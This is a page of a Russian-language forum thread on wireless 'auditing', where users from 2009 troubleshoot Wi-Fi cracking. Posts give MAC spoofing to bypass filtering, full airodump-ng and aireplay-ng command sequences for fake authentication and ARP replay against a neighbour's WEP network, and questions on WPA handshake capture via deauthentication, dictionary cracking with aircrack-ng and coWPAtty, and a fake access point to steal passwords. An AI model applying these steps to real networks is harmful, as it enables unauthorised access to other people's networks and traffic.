Аудит беспроводных сетей [Wi-Fi, BT], вопрос-ответ

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Elvis000, 10 Apr 2008.

  1. sergey_allll

    sergey_allll New Member

    Joined:
    7 Feb 2009
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    Здраствуйте всем.
    Если у вас проблема к подключению к точке доступа, на которой стоит фильтрация по маку то поменяйте себе мак на такой-же как у точки доступа к которой подключаетесь , и вы к ней подключитесь. Кто попробует напишите , у меня эта тема прокатывает......????
     
    #261 sergey_allll, 11 Oct 2009
    Last edited: 12 Oct 2009
  2. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    а если для этой точки вообще не показывает мак?
     
  3. valman

    valman New Member

    Joined:
    19 Feb 2009
    Messages:
    52
    Likes Received:
    0
    Reputations:
    0
    А есть пргоа эмулятор WI-FI точки к которой подключаются соседи и которая угоняет пассы?
     
  4. valman

    valman New Member

    Joined:
    19 Feb 2009
    Messages:
    52
    Likes Received:
    0
    Reputations:
    0
    У меня не прокатывает, есть МАС есть WEP пасс, при подключении к скрытой сети - выдает что невозможно подключится и даже не запрашивает пароль...
     
  5. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    что-то ни одного вразумительного ответа, где все умные дяди ? Тема называется вопрос-ответ, а тут одни вопросы
     
    1 person likes this.
  6. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    да он и не должен спрашивать, ты сам, вручную должен создать подключение, там прописать имя точки,к которой подключаешься, тип шифрования и ключик
    ---------------------------------------
    http://forum.hnet.ru/lofiversion/index.php/t68881.html
    тут вроде решили
     
    #266 samarin, 17 Oct 2009
    Last edited: 17 Oct 2009
  7. Sunseeker

    Sunseeker New Member

    Joined:
    10 Oct 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос. Купил Alfa AWUS036H в комплекте с 5 dbi анденнтой. Эта новая альфа не подхватывается BT3. BT4 ее увидил. Так вот стал пробовать под ней.

    Сначала попробовал над своим роутером.
    С винды сила сигнала на нее была около 80%

    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchancher --mac 00:11:22:33:44:55
    airmon-ng start wlan0

    airodump-ng wlan0

    BSSID PWR CH ENC ESSID
    xx:xx:xx:xx:xx:xx -22 6 WEP WRLS

    Вопрос, почему для роутера, который в 5м от меня PWR = -22?

    airodump-ng -c 6 -w 123 --bssid xx:xx:xx:xx:xx:xx wlan0

    Далее при попытке запустить aireplay-ng

    aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 -e WRLS wlan0
    Получается следующее:

    15:05:26 Sending Authentication Request (Open System) [ACK]
    15:05:26 Authentication successful
    15:05:26 Sending Association Request [ACK]
    15:05:26 Got a deauthentication packet! (Waiting 3 seconds)

    15:05:29 Sending Authentication Request (Open System) [ACK]
    15:05:29 Authentication successful
    15:05:29 Sending Association Request [ACK]
    15:05:29 Got a deauthentication packet! (Waiting 5 seconds)

    и т.д.

    В чем проблема, кто может подсказать?

    Затем пробовал с чужой сеткой тоже с WEP шифрованием.
    PWR показало около -70

    aireplay-ng -1 0 -a yy:yy:yy:yy:yy:yy -h 00:11:22:33:44:55 -e homeradio wlan0
    15:26:07 Waiting for beacon frame (BSSID: yy:yy:yy:yy:yy:yy) on channel 2

    15:26:07 Sending Authentication Request (Open System) [ACK]
    15:26:07 Authentication successful
    15:26:07 Sending Association Request [ACK]
    15:26:07 Association successful :) (AID: 1)
    root@bt:~# aireplay-ng -3 -b yy:yy:yy:yy:yy:yy -h 00:11:22:33:44:55 wlan0
    15:26:50 Waiting for beacon frame (BSSID: yy:Yy:yy:yy:yy:yy) on channel 2
    Saving ARP requests in replay_arp-1019-152650.cap
    You should also start airodump-ng to capture replies.
    ^Cad 644 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

    На этом все стопорится. Итог - медленный набор пакетов. Кто подскажет, с чем может быть связано, или я что-то не так делаю?
    Грешу на адаптер.
     
  8. valman

    valman New Member

    Joined:
    19 Feb 2009
    Messages:
    52
    Likes Received:
    0
    Reputations:
    0
    Ниче там не решили... Вопрос остается открытым.
     
  9. NuboCodder

    NuboCodder New Member

    Joined:
    20 Oct 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Насколько я понимаю, там сила сигнала отображается от -100(минимум) до 0(максимум) так что если хочешь получить привычное значение прибавь к своему 100.
     
  10. Sunseeker

    Sunseeker New Member

    Joined:
    10 Oct 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    руководствуясь видео по взлому WEP с помощью BT3, там есть и плюсовые значения...
     
  11. NuboCodder

    NuboCodder New Member

    Joined:
    20 Oct 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    О_о, ну по крайней мере я спокойно сидел в инете и при сигнале в -78 за стеной на расстоянии в 3 метра от точки, так что особо расстраиваться не стоит.
     
    #271 NuboCodder, 23 Oct 2009
    Last edited: 23 Oct 2009
  12. smc

    smc New Member

    Joined:
    9 Oct 2009
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Хотел задать вопрос
    Развелось много тем по взлому wifi, у меня нет времени просматривать все, чтобы найти подходящую. Если немного оффтоп, то прошу не обижаться...

    при атаке на точку доступа использующуй WPA нужно захватить "four-way-handshake" между клиентом и точкой доступа. Если я правильно понял, то делать это нужно в момент когда клент подключается. Можно провести деаутентикацию с помощью aireplay-ng. Ловятся пакеты с помощью airodump. Так вот вопрос следующий: как узнать, что в "four-way-handshake" пойман и записан в .cap файл??
     
  13. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Пригодна ли broadcom карточка BCM4310 для вардрайвинга?
    Сколько не гуглил, мнения у всех разные...

    При попытке собрать пакеты под виндой AirDump ругнулся, что "Выбранный драйвер адаптера - не поддерживается PEEK протоколом"
     
  14. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    600
    Likes Received:
    339
    Reputations:
    148
    broadcom тяжелые карточки в принципе, из опыта не рекомендую. Д-линк проще и понятнее.
     
    1 person likes this.
  15. smc

    smc New Member

    Joined:
    9 Oct 2009
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    у меня broadcom BCM4310. долго искал инфу по ней. все что пока нарыл: под виндой шансов пока нет, дрова не написал никто... зато в линухе работает. проверял. пользуй BT4

    на мой прошлый вопрос никто не ответил, пришлось самому разбираться. теперь у меня есть еще один. кто-нибудь пробовал coWPAtty? поделитесь опытом, действительно ли быстрее перебирает.
    недавно пытался скачать с оффициального сайта -скачал, кстановил при запуске wpcap.dll не найден (WTF!?!?!?! с официального сайта качал) есть соображения на этот счет?
     
  16. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    это отдельная библиотека для работы с сетью. качай например отсюда _http://www.dll-files.com/dllindex/dll-files.shtml?wpcap и распаковывай в C:\Windows\system32
     
    1 person likes this.
  17. smc

    smc New Member

    Joined:
    9 Oct 2009
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    BrainDeaD, спасибо. скачал, запустил. теперь вот такая фигня творится. aircrack-ng ломает нормально. пароль находит. когда подставляю тот же .cap файл в coWPAtty софтина жалеутся, что в нем нет WPA handshake. хотя я уверен, что есть, да и aircrack-ng a то подтверждает
     
  18. vadim1963

    vadim1963 New Member

    Joined:
    15 Nov 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Хотел задать вопрос aircrack-ng WPA запустить русский словарь
     
  19. loc

    loc New Member

    Joined:
    1 Jun 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Какие драйвера/софт лучше использовать для PCI wi-fi адаптер D-link DWL-G520?! Подходит ли она для вардрайвинга?!
    Сильно не пинайте, если не туда.:)
    Всю тему не читал.. и так уже всю ночь сижу... (((
     
  20. levelup

    levelup New Member

    Joined:
    22 Jul 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    В AiroWizard'е жму на Start airserv-ng, через секунду все останавливается, в нижнем левом углу пишется airserv-ng terminated!. Aircrack-win работает нормально. Поскажите, плиз, в чем может быть проблема?
     
Loading...